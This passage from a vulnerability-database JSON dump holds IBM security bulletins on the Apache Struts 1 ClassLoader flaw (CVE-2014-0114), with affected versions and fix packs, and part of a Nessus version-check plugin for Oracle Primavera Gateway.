[_https://exchange.xforce.ibmcloud.com/vulnerabilities/92889_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nIBM InfoSphere Information Server versions 8.0, 8.1, 8.5, 8.7, and 9.1, \nIBM InfoSphere Information Server Information Services Director versions 8.0, 8.1, 8.5, 8.7, and 9.1, \nIBM InfoSphere Information Server Business Glossary versions 8.0, 8.1 and 8.5, \nIBM InfoSphere Information Server Metadata Workbench versions 8.0, 8.1, 8.5, 8.7, and 9.1, \neach running on all platforms. \nAlso, IBM InfoSphere Data Click version 10.0 running on Linux\n\n## Remediation/Fixes\n\n**_Product_**\n\n| **_VRMF_**| **_APAR_**| **_Remediation/First Fix_** \n---|---|---|--- \nInfoSphere Data Click| 10.0| JR50236| Contact IBM customer support to obtain the fix. \nInfoSphere Information Server and components| 9.1| JR50236 JR50276 \nJR50202| \\--Apply IBM InfoSphere Information Server version [_9.1.2.0_](<http://www-01.ibm.com/support/docview.wss?uid=swg24035470>) \n\\--Apply IBM InfoSphere Information Server Information Services Framework (ISF) [_ 9.1.2 Rollup Patch 2_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=%20is912_ru2_ISF_server_client_multi>) \n\\--Apply the IBM InfoSphere Information Server Metadata Workbench [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is912_security_mwb_server_multi>) \n**\\--**Follow instructions in the IBM InfoSphere Information Server Information Services Director [**_TechNote_**](<http://www-01.ibm.com/support/docview.wss?uid=swg21673620>) \nInfoSphere Information Server and components| 8.7| JR50236 JR50276 \nJR50202| \\--Apply IBM InfoSphere Information Server version [_8.7 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24034359>) \n\\--Apply the IBM InfoSphere Information Server Information Services Framework (ISF) [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8702_security_isf_server_multi>) \n\\--Apply the IBM InfoSphere Information Server Metadata Workbench [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is87_security_mwb_server_client_multi>) \n**\\--**Follow instructions in the IBM InfoSphere Information Server Information Services Director [**_TechNote_**](<http://www-01.ibm.com/support/docview.wss?uid=swg21673620>) \nInfoSphere Information Server and components| 8.5| JR50236 JR50276 \nJR50202| \\--Apply IBM InfoSphere Information Server version [_8.5 Fix Pack 3_](<http://www-01.ibm.com/support/docview.wss?uid=swg24033513>) \n\\--Apply IBM InfoSphere Information Server Information Services Framework (ISF) [_8.5 Rollup Patch 2_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8503_ru2_ISF_server_client_multi>) \n\\--Apply the IBM InfoSphere Information Server Metadata Workbench [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_security_mwb_server_client_multi>) \n\\--Apply the IBM InfoSphere Information Server Business Glossary [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is85_security_bg_server_multi>) \n**\\--**Follow instructions in the IBM InfoSphere Information Server Information Services Director [**_TechNote_**](<http://www-01.ibm.com/support/docview.wss?uid=swg21673620>) \nInfoSphere Information Server and components| 8.1| JR50236 JR50276 \nJR50202| \\--Apply IBM InfoSphere Information Server version [_8.1 Fix Pack 2_](<http://www-01.ibm.com/support/docview.wss?uid=swg24028376>) \n**\\--**Follow instructions in the IBM InfoSphere Information Server Information Services Director [**_TechNote_**](<http://www-01.ibm.com/support/docview.wss?uid=swg21673620>) \n\\--Apply the IBM InfoSphere Information Server Information Services Framework (ISF) [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8102_security_isf_server_multi>) \nIf you need the fix for Metadata Workbench or Business Glossary: \n\\--Apply IBM InfoSphere Foundation Tools version 8.1.2 (available on Passport Advantage). Information available [_here_](<http://www-01.ibm.com/support/docview.wss?uid=swg27017216&aid=1>). \n\\--Apply IBM InfoSphere Information Server version [_8.1.2 Fix Pack 5_](<http://www-01.ibm.com/support/docview.wss?uid=swg24030326>) \n\\--Apply the IBM InfoSphere Information Server Metadata Workbench [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8125_security_mwb_server_multi>) \n\\--Apply the IBM InfoSphere Information Server Business Glossary [_Security Patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is8125_security_bg_server_multi>) \nInfoSphere Information Server and components| 8.0| None| Contact IBM customer support. \n \n \nNote: The same fix may be listed under multiple vulnerabilities. Installing the fix addresses all vulnerabilities to which the fix applies. Also, some fixes require installing both a fix pack and a subsequent patch. While the fix pack must be installed first, any additional patches required may be installed in any order. \n\n## Workarounds and Mitigations\n\nNone known, apply fixes\n\n## ", "cvss3": {}, "published": "2018-06-16T14:07:02", "type": "ibm", "title": "Security Bulletin: Multiple IBM InfoSphere Information Server components are vulnerable due to ClassLoader manipulation vulnerability in Open Source Apache Struts version 1 (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-16T14:07:02", "id": "50E6A01BD478DEED9D4635F64814BCBD9DE715353A82634EA217E4D53F3DC5D2", "href": "https://www.ibm.com/support/pages/node/512019", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:41:18", "description": "## Summary\n\nPortions of IBM Rational Application Developer for WebSphere Software are shipped as a component of Rational Developer for Power Systems Software, Rational Developer for i, and Rational Developer for AIX and Linux. Information about a security vulnerability affecting Rational Application Developer has been published in a security bulletin.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview security bulletin [ClassLoader manipulation with Apache Struts in WebSphere Application Server affecting Rational Application Developer (CVE-2014-0114)](<http://www-01.ibm.com/support/docview.wss?uid=swg21674339>)** **for vulnerability details. \n\n## Affected Products and Versions\n\n**Affected Product and Version(s)**\n\n| **Product and Version shipped as a component** \n---|--- \nIBM Rational Developer for Power Tools for IBM i /AIX V8.5| Rational Application Developer 8.5 \nIBM Rational Developer for i RPG and COBOL + Modernization Tools, Java Edition v9.0, 9.0.0.1, 9.0.1, 9.1| Rational Application Developer 9.0, 9.0.1, and 9.1 respectively \nIBM Rational Developer for i RPG and COBOL + Modernization Tools, Java Edition v9.0, 9.0.0.1, 9.0.1, 9.1| Rational Application Developer 9.0, 9.0.1, and 9.1 respectively \nIBM Rational Developer for i RPG and COBOL + Modernization Tools, EGL Edition v9.0, 9.0.0.1, 9.0.1, 9.1| Rational Application Developer 9.0, 9.0.1, and 9.1 respectively \nIBM Rational Developer for AIX and Linux v9.0, 9.0.0.1, 9.0.1, 9.1, AIX COBOL Edition| Rational Application Developer 9.0, 9.0.1, and 9.1 respectively \nIBM Rational Developer for AIX and Linux v9.0, 9.0.0.1, 9.0.1, 9.1 C/C++ Edition| Rational Application Developer 9.0, 9.0.1, and 9.1 respectively \n \n## Remediation/Fixes\n\nReview the **Remediation/Fixes** section in security bulletin [ClassLoader manipulation with Apache Struts in WebSphere Application Server affecting Rational Application Developer (CVE-2014-0114)](<http://www-01.ibm.com/support/docview.wss?uid=swg21674339>)** **for instructions on obtaining the fix for this issue.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts in WebSphere Application Server affecting Rational Developer for Power Systems Software, Rational Developer for AIX and Linux, Rational Developer for i, (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-08-03T04:23:43", "id": "80489411CAB04FBDC8043529670BEC2C45004C175864AC8845B7DAE26D981661", "href": "https://www.ibm.com/support/pages/node/512151", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:43:52", "description": "## Summary\n\nIBM WebSphere Application Server version 7 is shipped as a component of IBM Intelligent Operations Center version 1.6. Information about security vulnerabilities affecting IBM WebSphere Application Server version 7 has been published in a security bulletin.\n\n## Vulnerability Details\n\nPlease consult the security bulletin [Classloader Manipulation Vulnerability in IBM WebSphere Application Server CVE-2014-0114](<http://www-01.ibm.com/support/docview.wss?uid=swg21672316>) for vulnerability details.\n\n## Affected Products and Versions\n\n**Affected Product and Version(s)**\n\n| **Product and Version shipped as a component** \n---|--- \nIBM Intelligent Operations Center 1.6| IBM WebSphere Application Server 7 \n \n## Remediation/Fixes\n\nEither apply Interim Fix [PI17190](<http://www-01.ibm.com/support/docview.wss?uid=swg24037506>), or apply Fix Pack 7.0.0.33 or later (targeted to be available 23 June 2014).\n\n## ", "cvss3": {}, "published": "2018-06-17T22:28:17", "type": "ibm", "title": "Security Bulletin: Security vulnerabilities have been identified in IBM\u00ae WebSphere Application Server version 7 shipped with IBM Intelligent Operations Center version 1.6 (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T22:28:17", "id": "150C26A4B23CEB9D10D6B5FB3E82060606745E070EDD31CF3D53C5969B98B0BF", "href": "https://www.ibm.com/support/pages/node/511529", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T01:40:37", "description": "## Summary\n\nThe Struts tool of IBM Rational Application Developer is shipped as a component of Rational Business Developer. The Struts tool is affected by a classloader manipulation vulnerability in Apache Struts. Information about the security vulnerability affecting Rational Application Developer has been published in a security bulletin.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \nReview the security bulletin [ClassLoader manipulation with Apache Struts affecting Rational Application Developer (CVE-2014-0114)](<http://www-01.ibm.com/support/docview.wss?uid=swg21674310>) for vulnerability details. \n\n## Affected Products and Versions\n\nVersion 9.1 and earlier of Rational Business Developer are affected.\n\n## Remediation/Fixes\n\nReview the **Remediation/Fixes** Section of Security bulletin [ClassLoader manipulation with Apache Struts affecting Rational Application Developer (CVE-2014-0114)](<http://www-01.ibm.com/support/docview.wss?uid=swg21674310>) for instructions on obtaining the fix for this issue.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-08-03T04:23:43", "type": "ibm", "title": "Security Bulletin: ClassLoader manipulation with Apache Struts in Rational Application Developer affecting Rational Business Developer (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-08-03T04:23:43", "id": "0F254BE920E96D803CA1A391E1B8A3B0C658E51C8C31B0AC0F95FEDD45279D52", "href": "https://www.ibm.com/support/pages/node/245895", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:48:08", "description": "## Summary\n\nSecurity Bulletin: Open Source Apache Struts V1 ClassLoader manipulation vulnerability (CVE-2014-0114) in IBM Content Navigator\n\n## Vulnerability Details\n\n**CVEID: **CVE-2014-0114 \n \n**DESCRIPTION: ** \nOpen Source Apache Struts V1 ClassLoader manipulation vulnerability \n \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for more information \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nIBM Content Navigator 2.0.0, 2.0.1, and 2.0.2 \n \nIBM Content Navigator is a component that is available to customers in these products (and the products that contain them): \n \n\u00b7 IBM Content Manager \n\u00b7 IBM FileNet Content Manager \n\u00b7 IBM Content Foundation \n\u00b7 IBM Content Manager OnDemand\n\n## Remediation/Fixes\n\nVersion 2.0.0: Upgrade to Content Navigator 2.0.2 and apply fix pack 2.0.2.4-ICN-FP004 \n \nVersion 2.0.1: Apply Interim Fix 2.0.1.2-ICN-IF002 \n \nVersion 2.0.2: Apply fix pack 2.0.2.4-ICN-FP004\n\n## Workarounds and Mitigations\n\nN/A\n\n## ", "cvss3": {}, "published": "2018-06-17T12:07:47", "type": "ibm", "title": "Security Bulletin: Open Source Apache Struts V1 ClassLoader manipulation vulnerability (CVE-2014-0114) in IBM Content Navigator", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T12:07:47", "id": "3ED9EC3F8407924DA03D3ABC905C0426524C3277480EB60950F0B1E4F641977E", "href": "https://www.ibm.com/support/pages/node/511773", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-21T05:49:28", "description": "## Summary\n\nThere is a classloader manipulation vulnerability in Apache Struts 1 that is used by the IBM Rational Change application.\n\n## Vulnerability Details\n\n| **Subscribe to My Notifications to be notified of important product support alerts like this.**\n\n * Follow [this link](<https://www.ibm.com/systems/support/myview/subscription/css.wss/subscriptions?methodName=startSearchToSubscribe&uctug_rational_dcfsbblurb_2013-11-05_myn_adoption_promo>) for more information (requires login with your IBM ID) \n---|--- \n \n**CVEID:** [_CVE-2014-0114_](<https://vulners.com/cve/CVE-2014-0114>) \n \n**Description:** Apache Struts could allow a remote attacker to execute arbitrary code on the system. Struts 1 is used by Rational Change application. \n \n**CVSS Base Score:** 7.5 \n**CVSS Temporal Score:** See <https://exchange.xforce.ibmcloud.com/vulnerabilities/92889> for the current score \n**CVSS Environmental Score*:** Undefined \n**CVSS Vector:** (AV:N/AC:L/Au:N/C:P/I:P/A:P) \n\n## Affected Products and Versions\n\nThis problem affects the following versions of Rational Change application: \n\n\n * Version 5.2\n * Version 5.3\n * Version 5.3.1\n\n## Remediation/Fixes\n\nUpgrade to one of the following releases: \n\n\n * For release 5.2, apply [Rational Change Interim Fix 4 for 5.2.0.8](<http://www.ibm.com/support/docview.wss?uid=swg24037433>) \n \n\n * For release 5.3, apply [Rational Change Interim Fix 2 for 5.3.0.6](<http://www.ibm.com/support/docview.wss?uid=swg24037953>) \n \n\n * For release 5.3.1, apply [Rational Change Interim Fix 1 for 5.3.1.1](<http://www.ibm.com/support/docview.wss?uid=swg24037371>)\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2018-06-17T04:55:16", "type": "ibm", "title": "Security Bulletin: Classloader Manipulation Vulnerability in Rational Change (CVE-2014-0114)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2018-06-17T04:55:16", "id": "3230B5C261EC75BE3334755D51C9AB2E3BF3C718B1D0EB81405BE610E871641B", "href": "https://www.ibm.com/support/pages/node/514475", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-02-23T21:42:10", "description": "## Summary\n\nA vulnerability in Apache Commons BeanUtils was addressed by IBM InfoSphere Information Server. \n\n## Vulnerability Details\n\n**CVEID:** _[CVE-2014-0114](<https://vulners.com/cve/CVE-2014-0114>)_ \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by the failure to restrict the setting of Class Loader attributes. An attacker could exploit this vulnerability using the class parameter of an ActionForm object to manipulate the ClassLoader and execute arbitrary code on the system. \nCVSS Base Score: 7.5 \nCVSS Temporal Score: See _<https://exchange.xforce.ibmcloud.com/vulnerabilities/92889>_ for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (AV:N/AC:L/Au:N/C:P/I:P/A:P)\n\n## Affected Products and Versions\n\nThe following product, running on all supported platforms, is affected: \nIBM InfoSphere Information Server : versions 11.3, 11.5, 11.7 \nIBM InfoSphere Information Server on Cloud : versions 11.5, 11.7\n\n## Remediation/Fixes\n\n_Product_\n\n| _VRMF_ | _APAR_ | _Remediation/First Fix_ \n---|---|---|--- \nInfoSphere Information Server, Information Server on Cloud | 11.7 | [_JR61135_](<http://www.ibm.com/support/docview.wss?uid=swg1JR61135>) | \\--Apply IBM InfoSphere Information Server version [_11.7.1.0_](<https://www.ibm.com/support/docview.wss?uid=ibm10878310>) \n\\--Apply IBM InfoSphere Information Server _[11.7.1.0 Service Pack 1](<http://www.ibm.com/support/docview.wss?uid=ibm10957209>)_ \n \n \nInfoSphere Information Server, Information Server on Cloud | 11.5 | [_JR61135_](<http://www.ibm.com/support/docview.wss?uid=swg1JR61135>) \n[_JR61551_](<http://www.ibm.com/support/docview.wss?uid=swg1JR61551>) | \\--Apply InfoSphere Information Server version [_11.5.0.2_](<http://www.ibm.com/support/docview.wss?uid=swg24043666>) \n\\--Apply InfoSphere Information Server [_11.5.0.2 Service Pack 6_](<https://www-01.ibm.com/support/docview.wss?uid=ibm10957521>) \n\\--Apply InfoSphere _[Information Server Framework Security patch](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11502_isf_ru12_services_engine_client_multi>)_ \n\\--Apply InfoSphere [_Metadata Asset Manager Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11502_JR60965_imam_services_engine_all*>) \n\\--Apply InfoSphere [_Governance Catalog Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11502_JR61551_IGC_services_engine_all>) \n\\--Apply InfoSphere [_Component Installer Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11502_JR60963_comp-inst_engine_*>) \n\\--Apply InfoSphere [_Common Metadata Services Security patch_](<http://www.ibm.com/support/fixcentral/swg/quickorder?&product=ibm/Information+Management/IBM+InfoSphere+Information+Server&function=fixId&fixids=is11502_JR60965_CMS_services_engine_all*>) \nInfoSphere Information Server | 11.3 | [_JR61135_](<http://www.ibm.com/support/docview.wss?uid=swg1JR61135>) | \\--Upgrade to a new release where the issue has been addressed \n \n**Contact Technical Support:**\n\nIn the United States and Canada dial **1-800-IBM-SERV** \nView the support [contacts for other countries](<http://www.ibm.com/planetwide/>) outside of the United States. \nElectronically [open a Service Request](<http://www.ibm.com/software/support/probsub.html>) with Information Server Technical Support.\n\n## Workarounds and Mitigations\n\nNone\n\n## ", "cvss3": {}, "published": "2019-11-01T21:53:43", "type": "ibm", "title": "Security Bulletin: A vulnerability in Apache Commons BeanUtils affects IBM InfoSphere Information Server", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2019-11-01T21:53:43", "id": "3582AA92271267A0985635BDFBC8FC9F24691B1A4D1B420CDED32DF204F71D26", "href": "https://www.ibm.com/support/pages/node/887119", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2023-05-24T14:30:21", "description": "According to its self-reported version number, the Oracle Primavera Gateway installation running on the remote web server is 15.x prior to 15.2.17, 16.x prior to 16.2.10, 17.x prior to 17.12.5, or 18.x prior to 18.8.7. It is, therefore, affected by multiple vulnerabilities:\n\n - An arbitrary file read vulnerability exists in the FasterXML jackson-databind component, which is version 2.x prior to 2.9.9. This vulnerability is due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. An unauthenticated, remote attacker can exploit this by hosting a crafted MySQL server reachable by the victim and sending a crated JSON message that allows them to read arbitrary files and disclose sensitive information. (CVE-2019-12086)\n\n - Denial of service (DoS) vulnerabilities exist in the Apache POI component, which is prior to 3.1.7, due to a flaw when parsing crafted WMF, EMF, MSG, macros, DOC, PPT, and XLS. An unauthenticated, remote attacker can exploit this issue, via sending crafted input, to cause the application to stop responding.\n (CVE-2017-12626)\n\n - A remote code execution vulnerability exists in the FasterXML jackson-databind component, which is prior to 2.9.0.2, due to a flaw in how default typing is handled when ehcache is used because of net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary commands. (CVE-2019-14379)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {}, "published": "2019-10-18T00:00:00", "type": "nessus", "title": "Oracle Primavera Gateway Multiple Vulnerabilities (Oct 2019 CPU)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-12626", "CVE-2019-12086", "CVE-2019-14379"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:oracle:primavera_gateway"], "id": "ORACLE_PRIMAVERA_GATEWAY_CPU_OCT_2019.NASL", "href": "https://www.tenable.com/plugins/nessus/130019", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(130019);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2017-12626\", \"CVE-2019-12086\", \"CVE-2019-14379\");\n script_bugtraq_id(102879, 109227);\n script_xref(name:\"IAVA\", value:\"2019-A-0380\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0004\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n\n script_name(english:\"Oracle Primavera Gateway Multiple Vulnerabilities (Oct 2019 CPU)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An application running on the remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the Oracle Primavera Gateway installation running on the remote web\nserver is 15.x prior to 15.2.17, 16.x prior to 16.2.10, 17.x prior to 17.12.5, or 18.x prior to 18.8.7. It is,\ntherefore, affected by multiple vulnerabilities:\n\n - An arbitrary file read vulnerability exists in the FasterXML jackson-databind component, which is version\n 2.x prior to 2.9.9. This vulnerability is due to missing com.mysql.cj.jdbc.admin.MiniAdmin validation. An\n unauthenticated, remote attacker can exploit this by hosting a crafted MySQL server reachable by the\n victim and sending a crated JSON message that allows them to read arbitrary files and disclose sensitive\n information. (CVE-2019-12086)\n\n - Denial of service (DoS) vulnerabilities exist in the Apache POI component, which is prior to 3.1.7, due\n to a flaw when parsing crafted WMF, EMF, MSG, macros, DOC, PPT, and XLS. An unauthenticated, remote\n attacker can exploit this issue, via sending crafted input, to cause the application to stop responding.\n (CVE-2017-12626)\n\n - A remote code execution vulnerability exists in the FasterXML jackson-databind component, which is prior\n to 2.9.0.2, due to a flaw in how default typing is handled when ehcache is used because of \n net.sf.ehcache.transaction.manager.DefaultTransactionManagerLookup. An unauthenticated, remote attacker\n can exploit this to bypass authentication and execute arbitrary commands. (CVE-2019-14379)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version\nnumber.\");\n # https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html#AppendixPVA\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?f7302206\");\n # https://support.oracle.com/rs?type=doc&id=2593049.1%20\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8f2e008f\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Oracle Primavera Gateway version 15.2.17 / 16.2.10 / 17.12.5 / 18.8.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2019-14379\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/10/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/10/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:oracle:primavera_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"oracle_primavera_gateway.nbin\");\n script_require_keys(\"installed_sw/Oracle Primavera Gateway\");\n script_require_ports(\"Services/www\", 8006);\n\n exit(0);\n}\n\ninclude('http.inc');\ninclude('vcf.inc');\n\nget_install_count(app_name:'Oracle Primavera Gateway', exit_if_zero:TRUE);\n\nport = get_http_port(default:8006);\n\napp_info = vcf::get_app_info(app:'Oracle Primavera Gateway', port:port);\n\nvcf::check_granularity(app_info:app_info, sig_segments:2);\n\nconstraints = [\n { 'min_version' : '15.0.0', 'fixed_version' : '15.2.17' },\n { 'min_version' : '16.0.0', 'fixed_version' : '16.2.10' },\n { 'min_version' : '17.0.0', 'fixed_version' : '17.12.5' },\n { 'min_version' : '18.0.0', 'fixed_version' : '18.8.7' 